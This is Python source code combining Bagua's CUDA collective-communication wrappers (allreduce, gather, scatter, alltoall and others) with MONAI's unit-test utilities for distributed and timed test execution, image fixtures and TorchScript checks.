recv_tensor (torch.Tensor): Output of the collective, must have the same size of send_tensor.
dst (int): Destination rank.
op (optional): one of the values from `torch.distributed.ReduceOp`
enum. Specifies an operation used for element-wise reductions.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
""" # noqa: W293
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.reduce(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
dst,
to_bagua_reduce_op(op),
)
torch.cuda.synchronize()
def reduce_inplace(
tensor, dst, op=dist.ReduceOp.SUM, comm: B.BaguaSingleCommunicatorPy = None
):
r"""The inplace version of reduce."""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.reduce_inplace(
tensor.to_bagua_tensor().bagua_backend_tensor(), dst, to_bagua_reduce_op(op)
)
torch.cuda.synchronize()
def allreduce_coalesced_inplace(
tensors,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
for tensor in tensors:
assert tensor.device != torch.device(
"cpu"
), "input tensors must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
coalesced = flatten(tensors)
comm.allreduce_inplace(
coalesced.to_bagua_tensor("allreduce_coalesced"), to_bagua_reduce_op(op)
)
for buf, synced in zip(tensors, unflatten(coalesced, tensors)):
buf.copy_(synced)
# TODO: remove
torch.cuda.synchronize()
def allreduce(
send_tensor,
recv_tensor,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Reduces the tensor data across all machines in such a way that all get
the final result. After the call recv_tensor is going to be bitwise identical
in all processes.
Args:
send_tensor (torch.Tensor): Input of the collective.
recv_tensor (torch.Tensor): Output of the collective, must have the same size of send_tensor.
op (optional): one of the values from `torch.distributed.ReduceOp` enum. Specifies an operation used for element-wise reductions.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
Examples:
>>> from bagua.torch_api import allreduce
>>> # All tensors below are of torch.int64 type.
>>> # We have 2 process groups, 2 ranks.
>>> send_tensor = torch.arange(2, dtype=torch.int64) + 1 + 2 * rank
>>> recv_tensor = torch.zeros(2, dtype=torch.int64)
>>> send_tensor
tensor([1, 2]) # Rank 0
tensor([3, 4]) # Rank 1
>>> allreduce(send_tensor, recv_tensor)
>>> recv_tensor
tensor([4, 6]) # Rank 0
tensor([4, 6]) # Rank 1
>>> # All tensors below are of torch.cfloat type.
>>> # We have 2 process groups, 2 ranks.
>>> send_tensor = torch.tensor([1+1j, 2+2j], dtype=torch.cfloat) + 2 * rank * (1+1j)
>>> recv_tensor = torch.zeros(2, dtype=torch.cfloat)
>>> send_tensor
tensor([1.+1.j, 2.+2.j]) # Rank 0
tensor([3.+3.j, 4.+4.j]) # Rank 1
>>> allreduce(send_tensor, recv_tensor)
>>> recv_tensor
tensor([4.+4.j, 6.+6.j]) # Rank 0
tensor([4.+4.j, 6.+6.j]) # Rank 1
""" # noqa: E501
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.allreduce(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
to_bagua_reduce_op(op),
)
# TODO: remove
torch.cuda.synchronize()
def allreduce_inplace(
tensor,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of allreduce."""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.allreduce_inplace(
tensor.to_bagua_tensor().bagua_backend_tensor(), to_bagua_reduce_op(op)
)
torch.cuda.synchronize()
def allgather(
send_tensor,
recv_tensor,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Gathers send_tensors from all machines to recv_tensor.
Args:
send_tensor (torch.Tensor): Input of the collective.
recv_tensor (torch.Tensor): Output of the collective, must have size send_tensor.size()*comm.nranks.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.allgather(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
)
torch.cuda.synchronize()
def allgather_inplace(
tensor,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of allgather."""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.allgather_inplace(tensor.to_bagua_tensor().bagua_backend_tensor())
torch.cuda.synchronize()
def gather(
send_tensor,
recv_tensor,
dst,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Gathers send_tensors from all machines to recv_tensor in a single process.
Args:
send_tensor (torch.Tensor): Input of the collective.
recv_tensor (torch.Tensor): Output of the collective, must have size send_tensor.size()*comm.nranks.
dst (int): Destination rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.gather(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
dst,
)
torch.cuda.synchronize()
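# Sizing sketch (illustrative, not part of the original file): the receive
# buffer on the destination rank holds one send-sized chunk per rank.
#
#   send_tensor = torch.randn(8, device="cuda")
#   recv_tensor = torch.empty(8 * get_world_size(), device="cuda")   # only used on dst
#   gather(send_tensor, recv_tensor, dst=0)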
def gather_inplace(
tensor,
count,
dst,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of gather.
Args:
tensor (torch.Tensor): Input and output of the collective. For the dst process,
it has size count*comm.nranks() and acts as the recv_tensor above. For non-dst processes,
it has size count and acts as the send_tensor above.
count (int): The per-rank data count.
dst (int): Destination rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.gather_inplace(tensor.to_bagua_tensor().bagua_backend_tensor(), count, dst)
torch.cuda.synchronize()
def scatter(
send_tensor,
recv_tensor,
src,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Scatters send_tensor to all machines.
Args:
send_tensor (torch.Tensor): Input of the collective, must have size recv_tensor.size()*comm.nranks.
recv_tensor (torch.Tensor): Output of the collective.
src (int): Source rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.scatter(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
src,
)
torch.cuda.synchronize()
def scatter_inplace(
tensor,
count,
src,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of gather.
Args:
tensor (torch.Tensor): Input and output of the collective. For the src process,
it has size count*comm.nranks() and acts as the send_tensor above. For non-src processes,
it has size count and acts as the recv_tensor above.
count (int): The per-rank data count.
src (int): Source rank.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.scatter_inplace(
tensor.to_bagua_tensor().bagua_backend_tensor(), count, src
)
torch.cuda.synchronize()
def reduce_scatter(
send_tensor,
recv_tensor,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""Reduces on send_tensor, then scatters send_tensor to all machines.
Args:
send_tensor (torch.Tensor): Input of the collective, must have size recv_tensor.size()*comm.nranks.
recv_tensor (torch.Tensor): Output of the collective.
op (optional): one of the values from `torch.distributed.ReduceOp` enum. Specifies an operation used for element-wise reductions.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.reduce_scatter(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
to_bagua_reduce_op(op),
)
torch.cuda.synchronize()
def reduce_scatter_inplace(
tensor,
op=dist.ReduceOp.SUM,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of reduce_scatter.
Args:
tensor (torch.Tensor): Input and output of the collective, must satisfy: `tensor.size() % comm.nranks == 0`.
op (optional): one of the values from `torch.distributed.ReduceOp` enum. Specifies an operation used for element-wise reductions.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.reduce_scatter_inplace(
tensor.to_bagua_tensor().bagua_backend_tensor(), to_bagua_reduce_op(op)
)
torch.cuda.synchronize()
def alltoall(
send_tensor,
recv_tensor,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""All processes send data to all processes.
Args:
send_tensor (torch.Tensor): Input of the collective, must satisfy: `send_tensor.size() % comm.nranks == 0`.
recv_tensor (torch.Tensor): Output of the collective, must have the same size of send_tensor.
comm (B.BaguaSingleCommunicatorPy, optional): The bagua communicator to
work on. If None the global bagua communicator will be used.
Defaults to None.
"""
assert send_tensor.device != torch.device(
"cpu"
), "send tensor must be CUDA and dense"
assert recv_tensor.device != torch.device(
"cpu"
), "recv tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.alltoall(
send_tensor.to_bagua_tensor().bagua_backend_tensor(),
recv_tensor.to_bagua_tensor().bagua_backend_tensor(),
)
torch.cuda.synchronize()
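# Sizing sketch (illustrative, not part of the original file): each rank
# splits send_tensor into nranks equal chunks, sends chunk j to rank j, and
# receives one chunk from every rank, so both buffers have the same size.
#
#   n = get_world_size()
#   send_tensor = torch.arange(4 * n, dtype=torch.float32, device="cuda")
#   recv_tensor = torch.empty_like(send_tensor)
#   alltoall(send_tensor, recv_tensor)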
def alltoall_inplace(
tensor,
comm: B.BaguaSingleCommunicatorPy = None,
):
"""The inplace version of alltoall."""
assert tensor.device != torch.device("cpu"), "input tensor must be CUDA and dense"
if comm is None:
comm = get_backend("").global_communicator
event = torch.cuda.current_stream().record_event()
comm.cuda_stream.wait_event(event)
with torch.cuda.stream(comm.cuda_stream):
comm.alltoall_inplace(tensor.to_bagua_tensor().bagua_backend_tensor())
torch.cuda.synchronize()
utils.py
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import functools
import importlib
import os
import queue
import sys
import tempfile
import time
import traceback
import unittest
import warnings
from io import BytesIO
from subprocess import PIPE, Popen
from typing import Optional
from urllib.error import ContentTooShortError, HTTPError, URLError
import numpy as np
import torch
import torch.distributed as dist
from monai.config.deviceconfig import USE_COMPILED
from monai.data import create_test_image_2d, create_test_image_3d
from monai.utils import ensure_tuple, optional_import, set_determinism
from monai.utils.module import get_torch_version_tuple
nib, _ = optional_import("nibabel")
ver, has_pkg_res = optional_import("pkg_resources", name="parse_version")
quick_test_var = "QUICKTEST"
def test_pretrained_networks(network, input_param, device):
try:
net = network(**input_param).to(device)
except (URLError, HTTPError, ContentTooShortError) as e:
raise unittest.SkipTest(e)
return net
def test_is_quick():
return os.environ.get(quick_test_var, "").lower() == "true"
def skip_if_quick(obj):
"""
Skip the unit tests if environment variable `quick_test_var=true`.
For example, the user can skip the relevant tests by setting ``export QUICKTEST=true``.
"""
is_quick = test_is_quick()
return unittest.skipIf(is_quick, "Skipping slow tests")(obj)
class SkipIfNoModule:
"""Decorator to be used if test should be skipped
when optional module is not present."""
def __init__(self, module_name):
self.module_name = module_name
self.module_missing = not optional_import(self.module_name)[1]
def __call__(self, obj):
return unittest.skipIf(self.module_missing, f"optional module not present: {self.module_name}")(obj)
class SkipIfModule:
"""Decorator to be used if test should be skipped
when optional module is present."""
def __init__(self, module_name):
self.module_name = module_name
self.module_avail = optional_import(self.module_name)[1]
def __call__(self, obj):
return unittest.skipIf(self.module_avail, f"Skipping because optional module present: {self.module_name}")(obj)
def skip_if_no_cpp_extension(obj):
"""
Skip the unit tests if the cpp extension is not available
"""
return unittest.skipUnless(USE_COMPILED, "Skipping cpp extension tests")(obj)
def skip_if_no_cuda(obj):
"""
Skip the unit tests if torch.cuda.is_available is False
"""
return unittest.skipUnless(torch.cuda.is_available(), "Skipping CUDA-based tests")(obj)
def skip_if_windows(obj):
"""
Skip the unit tests if platform is win32
"""
return unittest.skipIf(sys.platform == "win32", "Skipping tests on Windows")(obj)
class SkipIfBeforePyTorchVersion:
"""Decorator to be used if test should be skipped
with PyTorch versions older than that given."""
def __init__(self, pytorch_version_tuple):
self.min_version = pytorch_version_tuple
if has_pkg_res:
self.version_too_old = ver(torch.__version__) < ver(".".join(map(str, self.min_version)))
else:
self.version_too_old = get_torch_version_tuple() < self.min_version
def __call__(self, obj):
return unittest.skipIf(
self.version_too_old, f"Skipping tests that fail on PyTorch versions before: {self.min_version}"
)(obj)
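# Usage sketch (illustrative, not part of the original file):
#
#   class MyTests(unittest.TestCase):
#       @SkipIfBeforePyTorchVersion((1, 8))
#       def test_needs_recent_torch(self):
#           ...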
class SkipIfAtLeastPyTorchVersion:
"""Decorator to be used if test should be skipped
with PyTorch versions newer than that given."""
def __init__(self, pytorch_version_tuple):
self.max_version = pytorch_version_tuple
if has_pkg_res:
self.version_too_new = ver(torch.__version__) >= ver(".".join(map(str, self.max_version)))
else:
self.version_too_new = get_torch_version_tuple() >= self.max_version
def __call__(self, obj):
return unittest.skipIf(
self.version_too_new, f"Skipping tests that fail on PyTorch versions at least: {self.max_version}"
)(obj)
def make_nifti_image(array, affine=None):
"""
Create a temporary nifti image on the disk and return the image name.
User is responsible for deleting the temporary file when done with it.
"""
if affine is None:
affine = np.eye(4)
test_image = nib.Nifti1Image(array, affine)
temp_f, image_name = tempfile.mkstemp(suffix=".nii.gz")
nib.save(test_image, image_name)
os.close(temp_f)
return image_name
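# Usage sketch (illustrative, not part of the original file): the caller
# removes the temporary file once it is no longer needed.
#
#   arr = np.random.rand(16, 16, 8).astype(np.float32)
#   fname = make_nifti_image(arr)
#   try:
#       img = nib.load(fname)
#   finally:
#       os.remove(fname)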
def make_rand_affine(ndim: int = 3, random_state: Optional[np.random.RandomState] = None):
"""Create random affine transformation (with values == -1, 0 or 1)."""
rs = np.random if random_state is None else random_state
vals = rs.choice([-1, 1], size=ndim)
positions = rs.choice(range(ndim), size=ndim, replace=False)
af = np.zeros([ndim + 1, ndim + 1])
af[ndim, ndim] = 1
for i, (v, p) in enumerate(zip(vals, positions)):
af[i, p] = v
return af
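# Note (illustrative, not part of the original file): the result is a signed
# permutation matrix in homogeneous form; for ndim=2 one possible output is
#   [[ 0, -1,  0],
#    [ 1,  0,  0],
#    [ 0,  0,  1]]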
class DistTestCase(unittest.TestCase):
"""
testcase without _outcome, so that it's picklable.
"""
def __getstate__(self):
self_dict = self.__dict__.copy()
del self_dict["_outcome"]
return self_dict
def __setstate__(self, data_dict):
self.__dict__.update(data_dict)
class DistCall:
"""
Wrap a test case so that it will run in multiple processes on a single machine using `torch.distributed`.
It is designed to be used with `tests.utils.DistTestCase`.
Usage:
decorate a unittest testcase method with a `DistCall` instance::
class MyTests(unittest.TestCase):
@DistCall(nnodes=1, nproc_per_node=3, master_addr="localhost")
def test_compute(self):
...
the `test_compute` method should trigger different worker logic according to `dist.get_rank()`.
Multi-node tests require a fixed master_addr:master_port, with node_rank set manually in multiple scripts
or from environment variable "NODE_RANK".
"""
def __init__(
self,
nnodes: int = 1,
nproc_per_node: int = 1,
master_addr: str = "localhost",
master_port: Optional[int] = None,
node_rank: Optional[int] = None,
timeout=60,
init_method=None,
backend: Optional[str] = None,
daemon: Optional[bool] = None,
method: Optional[str] = "spawn",
verbose: bool = False,
):
"""
Args:
nnodes: The number of nodes to use for distributed call.
nproc_per_node: The number of processes to call on each node.
master_addr: Master node (rank 0)'s address, should be either the IP address or the hostname of node 0.
master_port: Master node (rank 0)'s free port.
node_rank: The rank of the node, this could be set via environment variable "NODE_RANK".
timeout: Timeout for operations executed against the process group.
init_method: URL specifying how to initialize the process group.
Default is "env://" or "file:///d:/a_temp" (windows) if unspecified.
backend: The backend to use. Depending on build-time configurations,
valid values include ``mpi``, ``gloo``, and ``nccl``.
daemon: the process’s daemon flag.
When daemon=None, the initial value is inherited from the creating process.
method: set the method which should be used to start a child process.
method can be 'fork', 'spawn' or 'forkserver'.
verbose: whether to print NCCL debug info.
"""
self.nnodes = int(nnodes)
self.nproc_per_node = int(nproc_per_node)
if self.nnodes < 1 or self.nproc_per_node < 1:
raise ValueError(
f"number of nodes and processes per node must be >= 1, got {self.nnodes} and {self.nproc_per_node}"
)
self.node_rank = int(os.environ.get("NODE_RANK", "0")) if node_rank is None else int(node_rank)
self.master_addr = master_addr
self.master_port = np.random.randint(10000, 20000) if master_port is None else master_port
if backend is None:
self.backend = "nccl" if torch.distributed.is_nccl_available() and torch.cuda.is_available() else "gloo"
else:
self.backend = backend
self.init_method = init_method
if self.init_method is None and sys.platform == "win32":
self.init_method = "file:///d:/a_temp"
self.timeout = datetime.timedelta(0, timeout)
self.daemon = daemon
self.method = method
self._original_method = torch.multiprocessing.get_start_method(allow_none=False)
self.verbose = verbose
def run_process(self, func, local_rank, args, kwargs, results):
_env = os.environ.copy() # keep the original system env
try:
os.environ["MASTER_ADDR"] = self.master_addr
os.environ["MASTER_PORT"] = str(self.master_port)
os.environ["LOCAL_RANK"] = str(local_rank)
if self.verbose:
os.environ["NCCL_DEBUG"] = "INFO"
os.environ["NCCL_DEBUG_SUBSYS"] = "ALL"
os.environ["NCCL_BLOCKING_WAIT"] = str(1)
os.environ["OMP_NUM_THREADS"] = str(1)
os.environ["WORLD_SIZE"] = str(self.nproc_per_node * self.nnodes)
os.environ["RANK"] = str(self.nproc_per_node * self.node_rank + local_rank)
if torch.cuda.is_available():
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
torch.cuda.set_device(int(local_rank))
dist.init_process_group(
backend=self.backend,
init_method=self.init_method,
timeout=self.timeout,
world_size=int(os.environ["WORLD_SIZE"]),
rank=int(os.environ["RANK"]),
)
func(*args, **kwargs)
# the primary node lives longer to
# avoid _store_based_barrier, RuntimeError: Broken pipe
# as the TCP store daemon is on the rank 0
if int(os.environ["RANK"]) == 0:
time.sleep(0.1)
results.put(True)
except Exception as e:
results.put(False)
raise e
finally:
os.environ.clear()
os.environ.update(_env)
try:
dist.destroy_process_group()
except RuntimeError as e:
warnings.warn(f"While closing process group: {e}.")
def __call__(self, obj):
if not torch.distributed.is_available():
return unittest.skipIf(True, "Skipping distributed tests because not torch.distributed.is_available()")(obj)
if torch.cuda.is_available() and torch.cuda.device_count() < self.nproc_per_node:
return unittest.skipIf(
True,
f"Skipping distributed tests because it requires {self.nnodes} devices "
f"but got {torch.cuda.device_count()}",
)(obj)
_cache_original_func(obj)
@functools.wraps(obj)
def _wrapper(*args, **kwargs):
if self.method:
try:
torch.multiprocessing.set_start_method(self.method, force=True)
except (RuntimeError, ValueError):
pass
processes = []
results = torch.multiprocessing.Queue()
func = _call_original_func
args = [obj.__name__, obj.__module__] + list(args)
for proc_rank in range(self.nproc_per_node):
p = torch.multiprocessing.Process(
target=self.run_process, args=(func, proc_rank, args, kwargs, results)
)
if self.daemon is not None:
p.daemon = self.daemon
p.start()
processes.append(p)
for p in processes:
p.join()
if self.method:
try:
torch.multiprocessing.set_start_method(self._original_method, force=True)
except (RuntimeError, ValueError):
pass
assert results.get(), "Distributed call failed."
return _wrapper
class TimedCall:
"""
Wrap a test case so that it will run in a new process, raises a TimeoutError if the decorated method takes
more than `seconds` to finish. It is designed to be used with `tests.utils.DistTestCase`.
"""
def __init__(
self,
seconds: float = 60.0,
daemon: Optional[bool] = None,
method: Optional[str] = "spawn",
force_quit: bool = True,
skip_timing=False,
):
"""
Args:
seconds: timeout seconds.
daemon: the process’s daemon flag.
When daemon=None, the initial value is inherited from the creating process.
method: set the method which should be used to start a child process.
method can be 'fork', 'spawn' or 'forkserver'.
force_quit: whether to terminate the child process when `seconds` elapsed.
skip_timing: whether to skip the timing constraint.
This is useful when the constraint should depend on system
conditions such as `torch.cuda.is_available()`.
"""
self.timeout_seconds = seconds
self.daemon = daemon
self.force_quit = force_quit
self.skip_timing = skip_timing
self.method = method
self._original_method = torch.multiprocessing.get_start_method(allow_none=False) # remember the default method
@staticmethod
def run_process(func, args, kwargs, results):
try:
output = func(*args, **kwargs)
results.put(output)
except Exception as e:
e.traceback = traceback.format_exc()
results.put(e)
def __call__(self, obj):
if self.skip_timing:
return obj
_cache_original_func(obj)
@functools.wraps(obj)
def _wrapper(*args, **kwargs):
if self.method:
try:
torch.multiprocessing.set_start_method(self.method, force=True)
except (RuntimeError, ValueError):
pass
func = _call_original_func
args = [obj.__name__, obj.__module__] + list(args)
results = torch.multiprocessing.Queue()
p = torch.multiprocessing.Process(target=TimedCall.run_process, args=(func, args, kwargs, results))
if self.daemon is not None:
p.daemon = self.daemon
p.start()
p.join(timeout=self.timeout_seconds)
timeout_error = None
try:
if p.is_alive():
# create an Exception
timeout_error = torch.multiprocessing.TimeoutError(
f"'{obj.__name__}' in '{obj.__module__}' did not finish in {self.timeout_seconds}s."
)
if self.force_quit:
p.terminate()
else:
warnings.warn(
f"TimedCall: deadline ({self.timeout_seconds}s) "
f"reached but waiting for {obj.__name__} to finish."
)
finally:
p.join()
res = None
try:
res = results.get(block=False)
except queue.Empty: # no result returned, took too long
pass
finally:
if self.method:
try:
torch.multiprocessing.set_start_method(self._original_method, force=True)
except (RuntimeError, ValueError):
pass
if isinstance(res, Exception): # other errors from obj
if hasattr(res, "traceback"):
raise RuntimeError(res.traceback) from res
raise res
            if timeout_error: # the call did not finish within the deadline
raise timeout_error
return res
return _wrapper
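# Hedged usage sketch (hypothetical test class, not part of the original utilities): TimedCall is
# meant to decorate a test method so that it runs in a freshly spawned process and a TimeoutError
# is raised if the deadline is missed.
class _TimedCallExample(unittest.TestCase):
    @TimedCall(seconds=5, force_quit=True)
    def test_finishes_in_time(self):
        # trivially fast work; a long-running body here would raise TimeoutError after 5 seconds
        self.assertEqual(1 + 1, 2)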
_original_funcs = {}
def _cache_original_func(obj) -> None:
"""cache the original function by name, so that the decorator doesn't shadow it."""
global _original_funcs
_original_funcs[obj.__name__] = obj
def _call_original_func(name, module, *args, **kwargs):
if name not in _original_funcs:
_original_module = importlib.import_module(module) # reimport, refresh _original_funcs
if not hasattr(_original_module, name):
            # re-importing the module did not restore the function
raise RuntimeError(f"Could not recover the original {name} from {module}: {_original_funcs}.")
f = _original_funcs[name]
return f(*args, **kwargs)
class NumpyImageTestCase2D(unittest.TestCase):
im_shape = (128, 64)
input_channels = 1
output_channels = 4
num_classes = 3
def setUp(self):
im, msk = create_test_image_2d(self.im_shape[0], self.im_shape[1], 4, 20, 0, self.num_classes)
self.imt = im[None, None]
self.seg1 = (msk[None, None] > 0).astype(np.float32)
self.segn = msk[None, None]
class TorchImageTestCase2D(NumpyImageTestCase2D):
def setUp(self):
NumpyImageTestCase2D.setUp(self)
self.imt = torch.tensor(self.imt)
self.seg1 = torch.tensor(self.seg1)
self.segn = torch.tensor(self.segn)
class NumpyImageTestCase3D(unittest.TestCase):
im_shape = (64, 48, 80)
input_channels = 1
output_channels = 4
num_classes = 3
def setUp(self):
im, msk = create_test_image_3d(self.im_shape[0], self.im_shape[1], self.im_shape[2], 4, 20, 0, self.num_classes)
self.imt = im[None, None]
self.seg1 = (msk[None, None] > 0).astype(np.float32)
self.segn = msk[None, None]
class TorchImageTestCase3D(NumpyImageTestCase3D):
def setUp(self):
NumpyImageTestCase3D.setUp(self)
self.imt = torch.tensor(self.imt)
self.seg1 = torch.tensor(self.seg1)
self.segn = torch.tensor(self.segn)
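# Hedged usage sketch (hypothetical test class, not part of the original utilities): subclassing
# one of the fixture classes above provides ready-made image/segmentation data via setUp.
class _NumpyFixtureExample(NumpyImageTestCase2D):
    def test_fixture_is_batched(self):
        # imt is created as im[None, None], i.e. with batch and channel dimensions prepended
        self.assertEqual(self.imt.ndim, 4)
        self.assertEqual(self.seg1.shape, self.imt.shape)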
def test_script_save(net, *inputs, eval_nets=True, device=None, rtol=1e-4):
"""
    Test the ability to save `net` as a TorchScript object, reload it, and apply inference. The values in `inputs`
    are forward-passed through the original network and its reloaded copy, and the corresponding outputs are compared.
    Both `net` and its reloaded copy are set to evaluation mode if `eval_nets` is True, and the forward passes are
    done under `torch.no_grad()`.
    The test currently runs on CPU; GPU execution is disabled pending CI fixes (see the TODO below).
"""
if True:
device = "cpu"
else:
# TODO: It would be nice to be able to use GPU if
# available, but this currently causes CI failures.
if not device:
device = "cuda" if torch.cuda.is_available() else "cpu"
# Convert to device
inputs = [i.to(device) for i in inputs]
scripted = torch.jit.script(net.cpu())
buffer = scripted.save_to_buffer()
reloaded_net = torch.jit.load(BytesIO(buffer)).to(device)
net.to(device)
if eval_nets:
net.eval()
reloaded_net.eval()
with torch.no_grad():
set_determinism(seed=0)
result1 = net(*inputs)
result2 = reloaded_net(*inputs)
set_determinism(seed=None)
# convert results to tuples if needed to allow iterating over pairs of outputs
result1 = ensure_tuple(result1)
result2 = ensure_tuple(result2)
for i, (r1, r2) in enumerate(zip(result1, result2)):
if None not in (r1, r2): # might be None
np.testing.assert_allclose(
r1.detach().cpu().numpy(),
r2.detach().cpu().numpy(),
rtol=rtol,
atol=0,
err_msg=f"failed on comparison number: {i}",
)
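# Hedged usage sketch (hypothetical network and inputs, not part of the original utilities): any
# torch.jit.script-able module plus matching example inputs is enough to exercise the check.
def _example_test_script_save():
    net = torch.nn.Linear(4, 2)
    test_script_save(net, torch.rand(1, 4))  # scripts, reloads, and compares the two forward passes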
def query_memory(n=2):
"""
Find best n idle devices and return a string of device ids.
"""
bash_string = "nvidia-smi --query-gpu=utilization.gpu,power.draw,memory.used --format=csv,noheader,nounits"
try:
p1 = Popen(bash_string.split(), stdout=PIPE)
output, error = p1.communicate()
free_memory = [x.split(",") for x in output.decode("utf-8").split("\n")[:-1]]
free_memory = np.asarray(free_memory, dtype=float).T
ids = np.lexsort(free_memory)[:n]
except (FileNotFoundError, TypeError, IndexError):
ids = range(n) if isinstance(n, int) else []
return ",".join([f"{int(x)}" for x in ids])
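# Hedged usage sketch (hypothetical helper, not part of the original utilities): the returned id
# string can be used directly to pin a process to the most idle GPUs.
def _example_pin_idle_gpus():
    os.environ["CUDA_VISIBLE_DEVICES"] = query_memory(2)  # e.g. "0,1"; fallback ids are used when nvidia-smi is unavailable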
